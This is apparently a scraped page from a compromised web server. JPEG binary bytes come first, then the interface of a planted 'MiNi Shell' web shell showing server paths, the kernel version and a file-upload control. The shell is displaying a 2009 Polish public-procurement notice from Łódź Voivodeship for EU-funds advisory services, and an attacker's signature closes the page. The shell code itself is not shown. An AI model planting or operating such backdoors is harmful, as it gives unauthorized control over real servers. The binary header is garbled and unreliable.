JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090424/120116-N-2009.html

<p class="kh_header"><b>Łódź: Usługi doradcze dla Beneficjentów przy przygotowaniu dokumentacji niezbędnej do aplikowania o środki w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013</b><br>
<b>Numer ogłoszenia: 120116 - 2009; data zamieszczenia: 24.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zawarcia umowy ramowej.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo  Łódzkie , al. Piłsudskiego 8, 90-051 Łódź, woj. łódzkie, tel. 042 6633385, 6633384, faks 042 6633391.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lodzkie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi doradcze dla Beneficjentów przy przygotowaniu dokumentacji niezbędnej do aplikowania o środki w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług polegających na doradztwie dla potencjalnych beneficjentów Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013 w zakresie weryfikacji prawidłowości dokumentacji projektowej (w szczególności raportu o oddziaływaniu przedsięwzięcia na środowisko, studium wykonalności, biznes planu, wniosku o dofinansowanie w ramach RPO WŁ) przygotowanej do złożenia w ramach naborów wniosków ogłaszanych przez Instytucję Zarządzającą RPO WŁ. Wykonawca w ramach świadczonej usługi zapewni również, że udzielone wsparcie dla podmiotów korzystających z usług doradczych będzie zgodne z przepisami prawa krajowego i unijnego dotyczącymi zasad udzielania pomocy publicznej lub pomocy de minimis. Przez obowiązek ten rozumie się w szczególności weryfikację występowania pomocy publicznej / pomocy de minimis w konkretnym przypadku udzielonej usługi doradczej oraz jej transponowanie w sposób zapewniający legalność udzielonej pomocy, co obejmuje między innymi sprawdzenie intensywności pomocy oraz składanie sprawozdań Zamawiającemu z udzielonego wsparcia, jego charakteru oraz wysokości.
2. Zamówienie będzie obejmowało 1000 godzin doradztwa dla potencjalnych beneficjentów RPO WŁ. 
3. Zamawiający zastrzega sobie prawo do zmniejszenia zakresu świadczenia wynikającego z umowy ramowej.
4. Usługi doradcze będą realizowane na terenie Województwa Łódzkiego w okresie od dnia podpisania umowy na udzielenie zamówienia publicznego do dnia 30 listopada 2009 r.
5. Miejscem świadczenia usług jest siedziba beneficjenta lub inne miejsce przez niego wskazane, pod warunkiem, że będzie ono zlokalizowane na terenie Województwa Łódzkiego.
6. Zamawiający zapłaci Wykonawcy wynagrodzenie za faktycznie zrealizowane usługi doradcze, w/g zaproponowanych w ofercie stawek za godzinę świadczenia usług na podstawie raportu sporządzonego przez Wykonawcę, podpisanego przez potencjalnego beneficjenta i Wykonawcę, potwierdzającego wymiar czasowy zrealizowanych usług oraz zawierającego opinię z weryfikacji bądź rekomendacje dla potencjalnego beneficjenta oraz informacje związane z występowaniem pomocy publicznej w danym projekcie.
7. Wykonawca zobowiązany jest rozpocząć realizację usługi w terminie 14 dni od daty wskazania przez Zamawiającego potencjalnego beneficjenta i zakresu świadczonych usług. Za dzień rozpoczęcia świadczenia usługi przyjmuje się dzień, w którym odbyło się pierwsze spotkanie Wykonawcy z potencjalnym beneficjentem.
8. Jednostką pomiaru wykonanych usług doradczych i jednocześnie jednostką stosowaną do rozliczeń za wykonane usługi doradcze jest godzina świadczenia usług doradczych. Przez godzinę usług doradczych rozumie się 60 minut efektywnego świadczenia usług doradczych, tj. faktycznego wykonywania czynności objętych niniejszym zamówieniem, w miejscu, o którym mowa w pkt 5 bez względu na liczbę osób zaangażowanych w doradztwo po stronie Wykonawcy, tj. niezależnie od tego, czy usługę wykonuje jedna osoba czy też cały zespół. W skład godziny świadczenia usług doradczych nie wlicza się czasu dojazdu Wykonawcy do siedziby beneficjenta, czasu poświęconego na zorganizowanie pracy Wykonawcy ani czasu poświęconego na inne czynności niezbędne do świadczenia usług doradczych, nie polegających na ich wykonywaniu. W szczególności nie wlicza się czasu poświęconego przez Wykonawcę na weryfikację dokumentacji sporządzonej przez Beneficjenta, która odbywa się poza miejscem świadczenia usługi, o którym mowa w pkt 5 i bez udziału przedstawicieli beneficjenta, jak również czasu poświęconego przez Wykonawcę na sporządzenie raportu z wykonania usługi doradczej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.40.00.00-8, 71.24.10.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, a w szczególności:
2.1.  Wykonawca wykazać się powinien wykonaniem usług polegających na sporządzeniu lub doradztwie przy sporządzeniu w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
a) trzech wniosków o dofinansowanie ze środków UE o łącznej wartości (bez podatku VAT) min. 15.000zł,
b) trzech biznes planów dla projektów współfinansowanych ze środków UE o łącznej wartości (bez podatku VAT) min. 15.000zł,
c) trzech studiów wykonalności dla projektów współfinansowanych ze środków UE o łącznej wartości (bez podatku VAT) min. 15.000zł,
d) trzech raportów o oddziaływaniu przedsięwzięcia na środowisko dla projektów współfinansowanych ze środków UE o łącznej wartości (bez podatku VAT) min.15.000zł

2.2. Wykonawca dysponować powinien potencjałem kadrowym (zespołem), który zapewni realizację przedmiotu zamówienia, składającym się co najmniej z pięciu członków posiadających łącznie następujące doświadczenie:
a) Członek Zespołu ds. Zarządzania Projektami - posiadający co najmniej roczne doświadczenie w jednostkach samorządowych, rządowych lub firmach konsultingowych w zarządzaniu projektami współfinansowanymi ze środków UE oraz w przygotowywaniu wniosków o dofinansowanie współfinansowanych ze środków UE,
b) Członek Zespołu ds. Ekonomiczno-Finansowych - posiadający co najmniej roczne doświadczenie w jednostkach samorządowych, rządowych lub firmach konsultingowych w zakresie przygotowywania lub weryfikacji analiz ekonomicznych i finansowych w tym biznes planów dla projektów współfinansowanych ze środków UE,
c) Członek Zespołu ds. Technicznych - posiadający co najmniej roczne doświadczenie w jednostkach samorządowych, rządowych lub firmach konsultingowych w zakresie opracowywania lub weryfikacji studiów wykonalności,
d) Członek Zespołu ds. Środowiska - posiadający co najmniej roczne doświadczenie w jednostkach samorządowych, rządowych lub firmach konsultingowych w zakresie opracowywania raportów o oddziaływaniu przedsięwzięcia na środowisko, o których mowa w ustawie z 27.04.2001 r. Prawo ochrony środowiska (Dz.U. z 2006 Nr 129, poz. 902 ze zm.),
e) Kierownik Zespołu - posiadający co najmniej roczne doświadczenie w jednostkach samorządowych, rządowych lub firmach konsultingowych w zarządzaniu projektami współfinansowanymi ze środków UE oraz w zakresie opracowywania dokumentacji projektowych dla projektów współfinansowanych ze środków UE;

3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie przepisów art. 24 ustawy Pzp.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) warunek określony w pkt 2.1. każdy z Wykonawców musi spełniać oddzielnie.
Warunek określony w pkt 2.2. spełniać musi co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
(Dla potrzeb oceny spełnienia warunku określonego w pkt 2.1., jeżeli wartość zostanie podana w walucie innej niż PLN, Zamawiający przyjmie średni kurs PLN do tej waluty podany przez NBP na dzień wystawienia dokumentu).

Ocena spełnienia ww. warunków dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Pzp, Zamawiający wymaga dołączenia do oferty w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę następujących dokumentów:
1.1. aktualny odpis z właściwego rejestru, albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.2. oświadczenia Wykonawcy o spełnieniu warunków z art. 22 ust. 1 ustawy Pzp według Załącznika Nr 3 do SIWZ,
1.3. oświadczenia Wykonawcy o niepodleganiu wykluczeniu z postępowania według Załącznika Nr 4 do SIWZ.
2. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Wykonawca do oferty zobowiązany jest dołączyć w formie oryginału lub kserokopii potwierdzonej za zgodność z oryginałem przez Wykonawcę następujące dokumenty:
2.1. wykaz wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie usług odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia, polegających na sporządzeniu lub doradztwie przy sporządzeniu:
a) trzech wniosków o dofinansowanie ze środków UE o łącznej wartości (bez podatku VAT) min. 15.000zł,
b) trzech biznes planów dla projektów współfinansowanych ze środków UE o łącznej wartości (bez podatku VAT) min. 15.000zł,
c) trzech studiów wykonalności dla projektów współfinansowanych ze środków UE o łącznej wartości (bez podatku VAT) min. 15.000zł,
d) trzech raportów o oddziaływaniu przedsięwzięcia na środowisko dla projektów współfinansowanych ze środków UE o łącznej wartości (bez podatku VAT) min.15.000zł, 
z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, według Załącznika Nr 5 do SIWZ.
2.2. dokumenty potwierdzające, że usługi, wskazane w Wykazie wykonanych usług, zostały wykonane należycie (np. referencje),
2.3. wykaz osób, którymi dysponuje lub będzie dysponował i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, według Załącznika do SIWZ Nr 6, oraz pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie Wykonawca wskazał takie osoby.

3. Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej dokumenty składa zgodnie z § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. 2006 r. Nr 87, poz. 605 ze zm.).
4. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia prowadzonego w celu zawarcia Umowy Ramowej (np. spółka cywilna, konsorcjum). W takim przypadku ich oferta musi spełniać następujące wymagania:
a) Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Uwaga: treść pełnomocnictwa powinna dokładnie określać zakres umocowania,
b) formularz stanowiący Załącznik Nr 3 do SIWZ (Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 Ustawy) podpisuje pełnomocnik, (uwaga: treść pełnomocnictwa powinna dokładnie określać zakres umocowania);
c) formularz stanowiący Załącznik Nr 4 do SIWZ (Oświadczenie o nie podleganiu wykluczeniu z postępowania) każdy z Wykonawców podpisuje oddzielnie.
d) wykaz wykonanych usług, stanowiący Załącznik Nr 5 do SIWZ, każdy z Wykonawców ubiegających się wspólnie o udzielenie zamówienia składa oddzielnie,
e) wykaz osób, stanowiący Załącznik Nr 6 do SIWZ Wykonawcy ubiegający się wspólnie o udzielenie zamówienia składają łącznie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lodzkie.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski w Łodzi, Departament Organizacyjny, Wydział ds. Zamówień Publicznych Al. Piłsudskiego 8, 90-051 Łódź, pok. 407.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2009 godzina 11:00, miejsce: Urząd Marszałkowski w Łodzi, Biuro Podawcze (Kancelaria), pokój 403, IV piętro, Al. Piłsudskiego 8, 90-051 Łódź.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com